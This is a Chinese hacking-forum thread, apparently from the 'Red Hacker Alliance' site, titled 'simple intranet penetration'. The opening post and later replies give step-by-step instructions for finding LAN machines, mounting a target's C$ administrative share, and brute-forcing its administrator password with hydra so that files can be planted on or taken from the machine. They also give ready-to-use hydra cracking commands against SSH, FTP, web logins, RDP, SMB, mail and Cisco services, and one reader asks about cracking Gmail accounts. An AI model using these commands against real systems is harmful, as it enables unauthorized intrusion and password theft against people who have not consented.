设为首页收藏本站
查看: 3841|回复: 25

简单的内网渗透

[复制链接]
  • TA的每日心情
    开心
    5 天前
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2020-8-27 11:32:25 | 显示全部楼层 |阅读模式
    大家好,我是玄青道人。想必大家来到咱们论坛也都是为了学习一些HACKER手段的吧。今天呢我给大家分享一个简单且老掉牙的方法去获得目标计算机的C盘。
    工具:hydra爆破工具(使用方法在文章末尾)
    首先我们需要获取对方的ip,在cmd中输入命令 arp a 或 net view 查看局域网内其他计算机目标。假设我们的目标计算机的IP地址是192.168.1.1 我们先ping一下它看是否能联通 ping 192.168.1.1。在保证其ping通的情况下使用命令 net use k:\\192.168.1.1\c$其原理其实就是将162.168.1.1的c盘为我们的k盘。当然要保证其本地开启的共享是否有C盘。查看本地开启的共享可以使用命令 net share。在输入前面net use k:\\192.168.1.1\c$的命令之后会让你输入该IP下的用户名和密码。假设我们通过某些手段得知了该用户名为administrator(其实就是管理员)之后,我们可以使用hydra来帮助我们进行爆破密码。我们将事先准备好的hydra文件放入C盘的根目录下,再将事先准备好的字典(pass.txt)放入hydra的文件夹中。输入命令 cd hydra 回车 hydra.exe-l administrator -p pass.txt 192.168.1.1回车。在爆破成功后再次输入命令net use k:\\192.168.1.1\c$并填入用户名和密码,我们便可以在自己的电脑上看到该用户共享过来的C盘。那么有了C盘我们便可在这C盘之上放入我们需要的或者是取出我们需要的就好了。
    手段比较老但是可以让小白们来试试练练手,其中的命令使用方式在Windows10中可能不太一样希望自己在查询之后在使用。好了现在奉上hydra的一些使用方法:
    1、破解ssh:
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh


    2、破解ftp:
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV


    3、get方式提交,破解web登录:
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php


    4、post方式提交,破解web登录:
    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。)


    5、破解https:
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

    6、破解teamspeak:
    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

    7、破解cisco:
    hydra -P pass.txt 10.36.16.18 cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

    8、破解smb:
    hydra -l administrator -P pass.txt 10.36.16.18 smb

    9、破解pop3:
    hydra -l muts -P pass.txt my.pop3.mail pop3

    10、破解rdp:
    hydra ip rdp -l administrator -P pass.txt -V

    11、破解http-proxy:
    hydra -l admin -P pass.txt http-proxy://10.36.16.18

    12、破解imap:
    hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    来自群组: 中国红客联盟[西北]

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
  • TA的每日心情
    开心
    前天 14:39
  • 签到天数: 1501 天

    [LV.Master]伴坛终老

    发表于 2020-8-27 12:16:01 | 显示全部楼层
    感谢楼主分享,期待楼主更多精彩!
    回复 支持 1 反对 0

    使用道具 举报

  • TA的每日心情
    开心
    昨天 12:48
  • 签到天数: 139 天

    [LV.7]常住居民III

    发表于 2020-8-27 12:40:04 | 显示全部楼层
    挺好,虽然老,但是详细
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    昨天 23:48
  • 签到天数: 40 天

    [LV.5]常住居民I

    发表于 2020-8-27 18:42:15 | 显示全部楼层
    挺详细的,I了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    昨天 20:04
  • 签到天数: 52 天

    [LV.5]常住居民I

    发表于 2020-8-28 00:02:40 | 显示全部楼层
    感谢大佬分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    前天 12:28
  • 签到天数: 143 天

    [LV.7]常住居民III

    发表于 2020-8-28 10:13:17 | 显示全部楼层
    本帖最后由 贪吃的高猫猫 于 2020-8-28 10:17 编辑

    补充下
    先生成弱口令字典
    1. john --wordlist --rules --stdout > m.txt
    复制代码

    破解win7远程共享密码
    1. hydra -l 用户名 -P ./m.txt smb://IP地址 -vV
    复制代码

    破解win7远程桌面密码
    1. hydra -l 用户名 -P ./m.txt rdp://IP地址 -vV
    复制代码
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2020-8-29 07:22
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2020-8-28 13:59:59 | 显示全部楼层
    这是千锋网络安全教育的吧
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    5 天前
  • 签到天数: 16 天

    [LV.4]偶尔看看III

     楼主| 发表于 2020-8-28 14:25:16 | 显示全部楼层
    本帖最后由 玄青道人 于 2020-8-28 14:43 编辑
    hollehi 发表于 2020-8-28 13:59
    这是千锋网络安全教育的吧


    不是,是我自己总结的,我还没那么有钱去报班的。哈哈ヾ(≧▽≦*)o
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-9-1 14:19
  • 签到天数: 209 天

    [LV.7]常住居民III

    发表于 2020-9-1 14:20:24 | 显示全部楼层
    挺好,虽然老,但是详细
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    昨天 09:24
  • 签到天数: 173 天

    [LV.7]常住居民III

    发表于 2020-9-4 08:31:08 | 显示全部楼层
    大佬你好,我看了一下帖子,这个工具现在能否破解gmail邮箱密码呢?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    前天 10:45
  • 签到天数: 35 天

    [LV.5]常住居民I

    发表于 2020-9-4 20:43:38 | 显示全部楼层
    感觉都懂了,去实践一下
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    5 天前
  • 签到天数: 16 天

    [LV.4]偶尔看看III

     楼主| 发表于 2020-9-5 16:15:07 | 显示全部楼层
    effing 发表于 2020-9-4 08:31
    大佬你好,我看了一下帖子,这个工具现在能否破解gmail邮箱密码呢?

    说实话自己没弄过gmail,不过你可以到这个网址去看看:https://zh.wikihow.com/%E7%A0%B4%E8%A7%A3Gmail

    附hydra常见服务爆破用法:
    SSH服务
    hydra -l  用户名  -P  字典  -t  线程 -vV -e ns ip ssh
    FTP服务
    (1)破解指定用户
    hydra ip ftp -l 用户名 -P 字典 -t(线程默认16)  -vv
    hydra ip ftp -l 用户名 -P 字典 -e ns(n表示空密码,s表示制定用户和密码试探-vv
    (2)批量破解
    hydra ip ftp -L 用户名.txt -P 字典.txt -t(线程默认16)  -vv
    破解web表单GET登陆
    hydra -L 用户名.txt -P 字典.txt -t(线程默认16) -e ns ip http-get -vv /admin
    hydra -L 用户名.txt -P 字典.txt -t(线程默认16) -e ns -f(找到就停止) ip http-get -vv /admin/index.php
    HTTPS破解
    hydra -m /index.php -l muts -P pass.txt  ip https
    破解Cisco
    hydra -P pass.txt ip cisco
    hydra -m cloud -P pass.txt ip cisco-enable
    破解smb
    hydra -l administrator -P pass.txt ip smb
    POP3
    hydra -l muts -P pass.txt my.pop3.mail pop3
    远程终端
    hydra -s 3389(指定端口)ip  rdp -L users.txt -P pass.txt -V


    hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

    [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

    -R 继续从上一次进度接着破解。

    -S 采用SSL链接。

    -s PORT 可通过这个参数指定非默认端口。

    -l LOGIN 指定破解的用户,对特定用户破解。

    -L FILE 指定用户名字典。

    -p PASS 小写,指定密码破解,少用,一般是采用密码字典。

    -P FILE 大写,指定密码字典。

    -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

    -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

    -M FILE 指定目标列表文件一行一条。

    -o FILE 指定结果输出文件。

    -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

    -t TASKS 同时运行的线程数,默认为16。

    -w TIME 设置最大超时的时间,单位秒,默认是30s。

    -v / -V 显示详细过程。

    server 目标ip

    service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
    http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
    ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
    rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
    teamspeak sip vmauthd firebird ncp afp等等。

    OPT 可选项

    5、破解https:
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
    6、破解teamspeak:
    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
    7、破解cisco:
    hydra -P pass.txt 10.36.16.18 cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
    8、破解smb:
    hydra -l administrator -P pass.txt 10.36.16.18 smb
    9、破解pop3:
    hydra -l muts -P pass.txt my.pop3.mail pop3
    10、破解rdp:
    hydra ip rdp -l administrator -P pass.txt -V
    11、破解http-proxy:
    hydra -l admin -P pass.txt http-proxy://10.36.16.18
    12、破解imap:
    hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    昨天 09:24
  • 签到天数: 173 天

    [LV.7]常住居民III

    发表于 2020-9-7 09:24:23 | 显示全部楼层
    玄青道人 发表于 2020-9-5 16:15
    说实话自己没弄过gmail,不过你可以到这个网址去看看:https://zh.wikihow.com/%E7%A0%B4%E8%A7%A3Gmail
    ...

    谢谢,不过我之前好像有看过一个视频能破解早期的gmail邮箱?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    6 天前
  • 签到天数: 20 天

    [LV.4]偶尔看看III

    发表于 2020-9-7 14:58:41 | 显示全部楼层
    好东西感谢楼主
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /3 下一条

    红盟社区--中国红客联盟 

    Processed in 0.091195 second(s), 28 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表